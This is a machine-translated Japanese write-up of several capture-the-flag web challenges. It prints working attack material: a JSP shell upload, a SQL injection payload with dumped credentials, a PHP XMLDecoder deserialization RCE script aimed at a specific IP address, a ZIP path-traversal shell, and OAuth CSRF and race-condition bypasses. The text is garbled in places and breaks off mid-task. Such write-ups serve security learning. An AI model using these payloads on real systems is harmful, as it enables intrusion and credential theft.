注文を作成するときに、Burpへのフォーム送信をインターセプトし、orderNameフィールドをanything.jspに変更し、orderフィールドにjspシェルのテキストを入力できます。

ロード後、シェルを開き（「ここで注文を確認できます」リンク）、tomcat webappsディレクトリをダウンロードし、その中にjspファイルとコンパイル済みクラスを見つけ、jadユーティリティ（WEB-INF / classes / ZN_Chocolate / CRYPTOを使用） /SecretGrandParentForBigBossesNeeds.class）必要なキーが表示されます：private String TrueSecretChocolateKey（）{return "ZNV：iMp0518UrU_53cR3T_k3y_50d11dcb46506e93917f82c0e828b1a9"; }

入力



ファイルアップロード機能を備えたサイト。

最初は、ホワイトリストをバイパスして、JSPシェルをXML形式でアップロードすることで簡単に解決できました。 その後、すべての参加者にソースコードが提供されました。

タスクは、ソースコードを読むことで「不正」な方法で解決できましたが、意図した方法で解決しました。



出力



JD-GUI： スクリーンショットでクラスを開きます。



ページインポートを解析するJSPチェッカーのソースコードを確認できます。 この愚かなチェッカーをバイパスする方法はたくさんありますが、ファイルシステムを読み取らずにフラグを取得しようとします。 最初、フラグはSecretGrandParentForBigBossesNeeds.classにありました。

public class SecretGrandParentForBigBossesNeeds { private String TrueSecretChocolateKey() { return "ZNV:3X@mPl3_k3y_a0a81ab87f74d307b8e51fd85048e714"; }
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

左側のスクリーンショットでは、継承されたクラスの長いチェーンを見ることができます。これは明らかに、リフレクションを使用する必要があることを示しています。 SecretGrandParentForBigBossesNeedsをインポートしようとすると失敗します。シークレットをインポートしてみましょう。

 <%@ page import="java.lang.reflect.*,ZN_Chocolate.CRYPTO.Secret" %> <% Secret s = new Secret(); out.println(s.TrueSecretChocolateKey()); %>
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

Hm、エラー500 ...読み取ることができるスタックトレースでは、「クラスSadBigBossのメソッドTrueSecretChocolateKeyは表示されません」。

あぁ！ ソースコードを修正した後、クラスの名前を変更しました。 しかし、とにかく、メソッドは表示されず、プライベートです。 リフレクションを使用してアクセス可能にします。

 <%@ page import="java.lang.reflect.*,ZN_Chocolate.CRYPTO.Secret" %> <% SadBigBoss s = new SadBigBoss(); Method method = s.getClass().getDeclaredMethod("TrueSecretChocolateKey"); method.setAccessible(true); out.println(method.invoke(s)); %>
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

それだけです、フラグはページにあります=）

1. admin.jsp、search.jsp、index.jsp、admin_login.jsp、adminochka.jsp、adminochka.jsp.bakが見つかりました

2.テスト/テストを削除（明らかに誰かが追加）



3.注入

potato 'AND' 1 \ '' = 1 union select 1、（select user（））、3-'=' 1％





ホスト：zn-java

バージョン：5.5.46-0ubuntu0.14.04.2

ユーザー：webappuser @ localhost

 wepapp.developers --------------------------------------- | id | username | password | --------------------------------------- | 0 | developer_Vasia | fpBA7BPlS8wJ | | 1 | developer_Jorik | 5FftW6Aua2ef | --------------------------------------- wepapp.goods ------------------------- | id | name | price | ------------------------- | 0 | potato | 40 | | 1 | apple | 100 | | 2 | carrot | 25 | | 3 | tomato | 120 | | 4 | pear | 70 | | 5 | tomato | 110 | | 12 | pear | 80 | | 13 | cucumber | 80 | ------------------------- wepapp.users ---------------------------- | id | username | password | ----------------------------
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

...



4.クライアントがトラフィックをコンパイルして記録しました

5. xmlデシリアライゼーションによるRCE（solve.php）



solve.php

非表示のテキスト

 <?php $x =<<<HTML <?xml version="1.0" encoding="UTF-8"?> <java version="1.8.0_05" class="java.beans.XMLDecoder"> <object id="_response" class="java.lang.String"> <string>Mode 1 to get a value</string> </object> <object id="runtime" class="java.lang.Runtime" method="getRuntime"> <void id="process" method="exec"> <string>cat webapps/flag.txt</string> </void> </object> <object idref="process"> <void id="inputStream" method="getInputStream"/> </object> <object id="inputStreamReader" class="java.io.InputStreamReader"> <object idref="inputStream"/> </object> <object id="bufferedReader" class="java.io.BufferedReader"> <object idref="inputStreamReader"/> </object> <object idref="bufferedReader"> <void id="line1" method="readLine"/> </object> <object idref="bufferedReader"> <void id="line2" method="readLine"/> </object> <string id="response"> <object idref="line1"/> <object idref="line2"/> </string> <object class="org.restlet.Response" method="getCurrent"> <void method ="setEntity"> <object idref = "response"/> <object class = "org.restlet.data.MediaType" field="TEXT_HTML"></object> </void> </object> </java> HTML; do { $socket = fsockopen("107.170.122.167", 80); } while (!$socket); $packet = "POST /ZN_HQ/API/prods HTTP/1.0\r\n"; $packet.= "Content-Type: application/x-java-serialized-object+xml\r\n"; $packet.= "Host: 107.170.122.167\n"; $packet.= "Connection: Close\r\n"; $packet.= "Content-Length: ".strlen($x)."\r\n"; $packet.= "Authorization: Basic ZGV2ZWxvcGVyX1Zhc2lhOmZwQkE3QlBsUzh3Sg==\r\n"; $packet.= "\r\n"; $packet.= $x; fwrite($socket, $packet); while(!@feof($socket)) echo fread($socket, 4096); fclose($socket); ?>
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

入力



OAuth（vk.com）機能を備えたサイト（0x3d.ru）。

検出中に、content.0x3d.ruおよびdev.0x3d.ru（127.0.0.1）サブドメインを見つけることができます。



出力



XSS、SQLインジェクション、RCEなど、多くの意図しないバグがありました。それらのいくつかをここで説明します。



1.認証バイパス（意図しない）

Burk Suiteを介してvkアカウントでログインし、認証トークン（？Code = ...）のリンクを取得して、プライベートタブでナビゲートします。 これで、特権ユーザーとしてログインし、ファイルをアップロードできます。



2.認証バイパス

Burk Suiteを使用してvkアカウントでログインし、認証トークン（？Code = ...）を使用してリンクを作成し、Webサイトに2つのイメージをロードするページを作成します（<img src = ...）：最初のログアウトをトリガーしますCSRF（/ logoutなど）、2番目は認証トークンリンクです。 このリンクを特権ユーザーに送信すると、彼（ボット）がナビゲートし、彼のアカウントがvkプロファイルに接続されます。 これで、特権ユーザーとしてログインできます。



3.競合状態（意図しない）

特権ユーザーはアバターをアップロードできます。 「* .php」は許可されませんが、「。jpg.php」は問題ありません=）シェルはどこにありますか？ アバターはcontent.0x3d.ru/avatarsにアップロードされますが、$ hash.jpgに変換されます。 ファイルが最初に同じディレクトリにアップロードされ、その後変換されたと仮定します。

BurpSuiteを使用して、100個のスレッドを起動し（GET /avatars/beched.jpg.php、Host：content.0x3d.ru）、beched.jpg.phpをアップロードします。 わあ200 たわごと、プレーンテキスト...彼らはこのディレクトリでPHPの実行を無効にしましたが、とにかく、これは危険なバグです。



4. SQLインジェクション（意図しない）

プライベートメッセージングインターフェイスにSQLインジェクションがあり、マルチINSERTおよび推測フィールドを使用してそれを悪用できました。 file_privとフラグはありませんでしたが、タスクの作成者によるPoC認証バイパスエクスプロイトへのリンクがありました。 そのサーバーでタスクの作業コピーを見つけました=）



5.コードの実行（意図しない）

そのため、著者のテストサーバーがあります。 ログインして、SQLインジェクションを確認しましょう。 うわー、file_priv = Yがあります！ ソースコードを読み取り、構成を読み取り、フラグなし=（

ただし、ZIPアップロード機能には他にも何かがあります。

 elseif(preg_match('/[.](ZIP)|(zip)|(RAR)|(rar)$/',$_FILES['fupload']['name'])) { $avatar = 'avatars/net-avatara.jpg'; $filename = $_FILES['fupload']['name']; $source = $_FILES['fupload']['tmp_name']; $target = $path_to_90_directory . $filename; move_uploaded_file($source, $target);//    $path_to_90_directory $command = 'python /var/www/0x3d.ru/zn1/avatars/unzip.py /var/www/0x3d.ru/zn1/avatars/'.$filename; $temp = exec($command, $output); }
      
      

        
        
        
      

    
        
        
        
      
      

        
        
        
      

    
     

そのため、ファイル名でコードを実行できます。 ただし、このテストサーバーにはフラグはありません％）



6.コードの実行

さあ、彼らが望むことをしましょう。 content.0x3d.ruのdocrootにシェルをアップロードしましょう。 github.com/ptoomey3/evilarcで行います

パストラバーサルを使用してZIPアーカイブを作成すると、必要なディレクトリに抽出されます（書き込み可能な場合）。 これでcontent.0x3d.ruにPHPシェルができました



7. open_basedir bypass（意図しない）

コマンド実行機能は無効になっていますが、DirectoryIteratorで任意のディレクトリを参照できます： ahack.ru/releases/glob_wrapper_open_basedir_exploit.php.txt

ところで、putenv（）およびmail（）は無効化されていませんが、どういうわけかライブラリのプリロードとsendmailのトリガーを介したコマンド実行は機能しません％）



8.フラグ

dev。0x3d.ruを覚えていますか？ Webシェルから試してみましょう。

readfile（ 'http://dev.0x3d.ru'）;

 $: nmap -p 5060 -T4 -A -v bank.defcon.su ..... PORT STATE SERVICE VERSION 5060/tcp open sip-proxy Asterisk PBX 11.17.1 |_sip-methods: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY, INFO, PUBLISH, MESSAGE .......